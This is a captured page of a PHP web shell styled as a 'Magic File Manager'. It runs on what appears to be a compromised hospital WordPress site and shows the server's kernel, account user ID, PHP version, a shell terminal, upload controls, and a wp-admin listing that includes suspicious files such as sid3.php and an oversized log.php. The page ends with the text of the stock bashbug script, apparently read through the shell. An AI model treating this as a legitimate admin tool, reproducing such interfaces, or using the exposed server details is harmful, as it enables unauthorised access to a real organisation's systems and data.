โœจ Magic File Manager

๐Ÿš€ Hostinger Optimized
๐Ÿ–ฅ๏ธ Server: Apache
๐Ÿ’ป System: Linux bom1plzcpnl503817.prod.bom1.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
๐Ÿ‘ค User: pnj6a06usxf3 (9714991)
๐Ÿ˜ PHP: 8.1.34
๐Ÿšซ Disabled: โœจ NONE

๐Ÿ’ป Terminal

๐Ÿ“ /home/pnj6a06usxf3/public_html/shivshaktihospital.co.in/wp-admin
$

๐Ÿ“ Create New

โฌ†๏ธ Upload File

๐Ÿ“Š Max upload: 32M | ๐Ÿ“ฆ Max POST: 128M

๐Ÿ“„ Name๐Ÿ“Š Size๐Ÿ”’ Permโšก Actions
๐Ÿ“ css--drwxr-xr-x
๐Ÿ“ images--drwxr-xr-x
๐Ÿ“ includes--drwxr-xr-x
๐Ÿ“ js--drwxr-xr-x
๐Ÿ“ maint--drwxr-xr-x
๐Ÿ“ network--drwxr-xr-x
๐Ÿ“ user--drwxr-xr-x
๐Ÿ˜ about.php17.572 KB-rw-r--r--
๐Ÿ˜ admin-ajax.php5.025 KB-rw-r--r--
๐Ÿ˜ admin-footer.php2.738 KB-rw-r--r--
๐Ÿ˜ admin-functions.php0.461 KB-rw-r--r--
๐Ÿ˜ admin-header.php9.066 KB-rw-r--r--
๐Ÿ˜ admin-post.php1.974 KB-rw-r--r--
๐Ÿ˜ admin.php12.632 KB-rw-r--r--
๐Ÿ˜ async-upload.php5.473 KB-rw-r--r--
๐Ÿ˜ authorize-application.php10.093 KB-rw-r--r--
๐Ÿ˜ comment.php11.37 KB-rw-r--r--
๐Ÿ˜ contribute.php5.523 KB-rw-r--r--
๐Ÿ˜ credits.php4.044 KB-rw-r--r--
๐Ÿ˜ custom-background.php0.471 KB-rw-r--r--
๐Ÿ˜ custom-header.php0.48 KB-rw-r--r--
๐Ÿ˜ customize.php11.314 KB-rw-r--r--
๐Ÿ˜ edit-comments.php14.145 KB-rw-r--r--
๐Ÿ˜ edit-form-advanced.php28.79 KB-rw-r--r--
๐Ÿ˜ edit-form-blocks.php15.164 KB-rw-r--r--
๐Ÿ˜ edit-form-comment.php13.652 KB-rw-r--r--
๐Ÿ˜ edit-link-form.php6.198 KB-rw-r--r--
๐Ÿ˜ edit-tag-form.php10.408 KB-rw-r--r--
๐Ÿ˜ edit-tags.php21.982 KB-rw-r--r--
๐Ÿ˜ edit.php19.484 KB-rw-r--r--
๐Ÿ˜ erase-personal-data.php7.329 KB-rw-r--r--
๐Ÿ“„ error_log9.984 KB-rw-r--r--
๐Ÿ˜ export-personal-data.php7.754 KB-rw-r--r--
๐Ÿ˜ export.php11.001 KB-rw-r--r--
๐Ÿ˜ font-library.php1.445 KB-rw-r--r--
๐Ÿ˜ freedoms.php4.467 KB-rw-r--r--
๐Ÿ˜ import.php7.584 KB-rw-r--r--
๐Ÿ˜ index.php7.68 KB-rw-r--r--
๐Ÿ˜ install-helper.php6.798 KB-rw-r--r--
๐Ÿ˜ install.php17.944 KB-rw-r--r--
๐Ÿ˜ link-add.php0.912 KB-rw-r--r--
๐Ÿ˜ link-manager.php4.259 KB-rw-r--r--
๐Ÿ˜ link-parse-opml.php2.657 KB-rw-r--r--
๐Ÿ˜ link.php2.888 KB-rw-r--r--
๐Ÿ˜ load-scripts.php2.021 KB-rw-r--r--
๐Ÿ˜ load-styles.php2.925 KB-rw-r--r--
๐Ÿ˜ log.php63.893 KB-rw-r--r--
๐Ÿ˜ media-new.php3.173 KB-rw-r--r--
๐Ÿ˜ media-upload.php3.582 KB-rw-r--r--
๐Ÿ˜ media.php0.8 KB-rw-r--r--
๐Ÿ˜ menu-header.php9.816 KB-rw-r--r--
๐Ÿ˜ menu.php17.709 KB-rw-r--r--
๐Ÿ˜ moderation.php0.3 KB-rw-r--r--
๐Ÿ˜ ms-admin.php0.191 KB-rw-r--r--
๐Ÿ˜ ms-delete-site.php4.505 KB-rw-r--r--
๐Ÿ˜ ms-edit.php0.211 KB-rw-r--r--
๐Ÿ˜ ms-options.php0.224 KB-rw-r--r--
๐Ÿ˜ ms-sites.php0.21 KB-rw-r--r--
๐Ÿ˜ ms-themes.php0.212 KB-rw-r--r--
๐Ÿ˜ ms-upgrade-network.php0.214 KB-rw-r--r--
๐Ÿ˜ ms-users.php0.21 KB-rw-r--r--
๐Ÿ˜ my-sites.php4.718 KB-rw-r--r--
๐Ÿ˜ nav-menus.php49.022 KB-rw-r--r--
๐Ÿ˜ network.php5.394 KB-rw-r--r--
๐Ÿ˜ options-connectors.php1.507 KB-rw-r--r--
๐Ÿ˜ options-discussion.php16.019 KB-rw-r--r--
๐Ÿ˜ options-general.php22.319 KB-rw-r--r--
๐Ÿ˜ options-head.php0.6 KB-rw-r--r--
๐Ÿ˜ options-media.php6.484 KB-rw-r--r--
๐Ÿ˜ options-permalink.php21.964 KB-rw-r--r--
๐Ÿ˜ options-privacy.php10.453 KB-rw-r--r--
๐Ÿ˜ options-reading.php9.959 KB-rw-r--r--
๐Ÿ˜ options-writing.php9.184 KB-rw-r--r--
๐Ÿ˜ options.php13.932 KB-rw-r--r--
๐Ÿ˜ plugin-editor.php13.741 KB-rw-r--r--
๐Ÿ˜ plugin-install.php7.259 KB-rw-r--r--
๐Ÿ˜ plugins.php30.023 KB-rw-r--r--
๐Ÿ˜ post-new.php2.703 KB-rw-r--r--
๐Ÿ˜ post.php10.567 KB-rw-r--r--
๐Ÿ˜ press-this.php2.412 KB-rw-r--r--
๐Ÿ˜ privacy-policy-guide.php3.668 KB-rw-r--r--
๐Ÿ˜ privacy.php2.453 KB-rw-r--r--
๐Ÿ˜ profile.php0.276 KB-rw-r--r--
๐Ÿ˜ revision.php5.699 KB-rw-r--r--
๐Ÿ˜ setup-config.php17.508 KB-rw-r--r--
๐Ÿ˜ sid3.php55.304 KB-rw-r--r--
๐Ÿ˜ site-editor.php12.19 KB-rw-r--r--
๐Ÿ˜ site-health-info.php4.075 KB-rw-r--r--
๐Ÿ˜ site-health.php10.183 KB-rw-r--r--
๐Ÿ˜ term.php2.196 KB-rw-r--r--
๐Ÿ˜ theme-editor.php16.874 KB-rw-r--r--
๐Ÿ˜ theme-install.php23.745 KB-rw-r--r--
๐Ÿ˜ themes.php48.563 KB-rw-r--r--
๐Ÿ˜ tools.php3.432 KB-rw-r--r--
๐Ÿ˜ update-core.php45.119 KB-rw-r--r--
๐Ÿ˜ update.php12.756 KB-rw-r--r--
๐Ÿ˜ upgrade-functions.php0.333 KB-rw-r--r--
๐Ÿ˜ upgrade.php6.24 KB-rw-r--r--
๐Ÿ˜ upload.php14.934 KB-rw-r--r--
๐Ÿ˜ user-edit.php40.863 KB-rw-r--r--
๐Ÿ˜ user-new.php24.086 KB-rw-r--r--
๐Ÿ˜ users.php25.096 KB-rw-r--r--
๐Ÿ˜ widgets-form-blocks.php5.112 KB-rw-r--r--
๐Ÿ˜ widgets-form.php19.129 KB-rw-r--r--
๐Ÿ˜ widgets.php1.086 KB-rw-r--r--
#!/bin/sh - # # bashbug - create a bug report and mail it to the bug address # # The bug address depends on the release status of the shell. Versions # with status `devel', `alpha', `beta', or `rc' mail bug reports to # chet@cwru.edu and, optionally, to bash-testers@cwru.edu. # Other versions send mail to bug-bash@gnu.org. # # Copyright (C) 1996-2004 Free Software Foundation, Inc. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # # configuration section: # these variables are filled in by the make target in Makefile # MACHINE="x86_64" OS="linux-gnu" CC="gcc" CFLAGS=" -DPROGRAM='bash' -DCONF_HOSTTYPE='x86_64' -DCONF_OSTYPE='linux-gnu' -DCONF_MACHTYPE='x86_64-redhat-linux-gnu' -DCONF_VENDOR='redhat' -DLOCALEDIR='/usr/share/locale' -DPACKAGE='bash' -DSHELL -DHAVE_CONFIG_H -I. -I. -I./include -I./lib -D_GNU_SOURCE -DRECYCLES_PIDS -DDEFAULT_PATH_VALUE='/usr/local/bin:/usr/bin' -DSYSLOG_HISTORY -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -Wno-parentheses -Wno-format-security" RELEASE="4.4" PATCHLEVEL="20" RELSTATUS="release" MACHTYPE="x86_64-redhat-linux-gnu" PATH=/bin:/usr/bin:/usr/local/bin:$PATH export PATH # Check if TMPDIR is set, default to /tmp : ${TMPDIR:=/tmp} #Securely create a temporary directory for the temporary files TEMPDIR=$TMPDIR/bbug.$$ (umask 077 && mkdir $TEMPDIR) || { echo "$0: could not create temporary directory" >&2 exit 1 } TEMPFILE1=$TEMPDIR/bbug1 TEMPFILE2=$TEMPDIR/bbug2 USAGE="Usage: $0 [--help] [--version] [bug-report-email-address]" VERSTR="GNU bashbug, version ${RELEASE}.${PATCHLEVEL}-${RELSTATUS}" do_help= do_version= while [ $# -gt 0 ]; do case "$1" in --help) shift ; do_help=y ;; --version) shift ; do_version=y ;; --) shift ; break ;; -*) echo "bashbug: ${1}: invalid option" >&2 echo "$USAGE" >&2 exit 2 ;; *) break ;; esac done if [ -n "$do_version" ]; then echo "${VERSTR}" exit 0 fi if [ -n "$do_help" ]; then echo "${VERSTR}" echo "${USAGE}" echo cat << HERE_EOF Bashbug is used to send mail to the Bash maintainers for when Bash doesn't behave like you'd like, or expect. Bashbug will start up your editor (as defined by the shell's EDITOR environment variable) with a preformatted bug report template for you to fill in. The report will be mailed to the bug-bash mailing list by default. See the manual for details. If you invoke bashbug by accident, just quit your editor without saving any changes to the template, and no bug report will be sent. HERE_EOF exit 0 fi # Figure out how to echo a string without a trailing newline N=`echo 'hi there\c'` case "$N" in *c) n=-n c= ;; *) n= c='\c' ;; esac BASHTESTERS="bash-testers@cwru.edu" case "$RELSTATUS" in alpha*|beta*|devel*|rc*) BUGBASH=chet@cwru.edu ;; *) BUGBASH=bug-bash@gnu.org ;; esac case "$RELSTATUS" in alpha*|beta*|devel*|rc*) echo "$0: This is a testing release. Would you like your bug report" echo "$0: to be sent to the bash-testers mailing list?" echo $n "$0: Send to bash-testers? $c" read ans case "$ans" in y*|Y*) BUGBASH="${BUGBASH},${BASHTESTERS}" ;; esac ;; esac BUGADDR="${1-$BUGBASH}" if [ -z "$DEFEDITOR" ] && [ -z "$EDITOR" ]; then if [ -x /usr/bin/editor ]; then DEFEDITOR=editor elif [ -x /usr/local/bin/ce ]; then DEFEDITOR=ce elif [ -x /usr/local/bin/emacs ]; then DEFEDITOR=emacs elif [ -x /usr/contrib/bin/emacs ]; then DEFEDITOR=emacs elif [ -x /usr/bin/emacs ]; then DEFEDITOR=emacs elif [ -x /usr/bin/xemacs ]; then DEFEDITOR=xemacs elif [ -x /usr/contrib/bin/jove ]; then DEFEDITOR=jove elif [ -x /usr/local/bin/jove ]; then DEFEDITOR=jove elif [ -x /usr/bin/vi ]; then DEFEDITOR=vi else echo "$0: No default editor found: attempting to use vi" >&2 DEFEDITOR=vi fi fi : ${EDITOR=$DEFEDITOR} : ${USER=${LOGNAME-`whoami`}} trap 'rm -rf "$TEMPDIR"; exit 1' 1 2 3 13 15 trap 'rm -rf "$TEMPDIR"' 0 UN= if (uname) >/dev/null 2>&1; then UN=`uname -a` fi if [ -f /usr/lib/sendmail ] ; then RMAIL="/usr/lib/sendmail" SMARGS="-i -t" elif [ -f /usr/sbin/sendmail ] ; then RMAIL="/usr/sbin/sendmail" SMARGS="-i -t" else RMAIL=rmail SMARGS="$BUGADDR" fi INITIAL_SUBJECT='[50 character or so descriptive subject here (for reference)]' cat > "$TEMPFILE1" <> $HOME/dead.bashbug echo "$0: mail to ${BUGADDR} failed: report saved in $HOME/dead.bashbug" >&2 echo "$0: please send it manually to ${BUGADDR}" >&2 } exit 0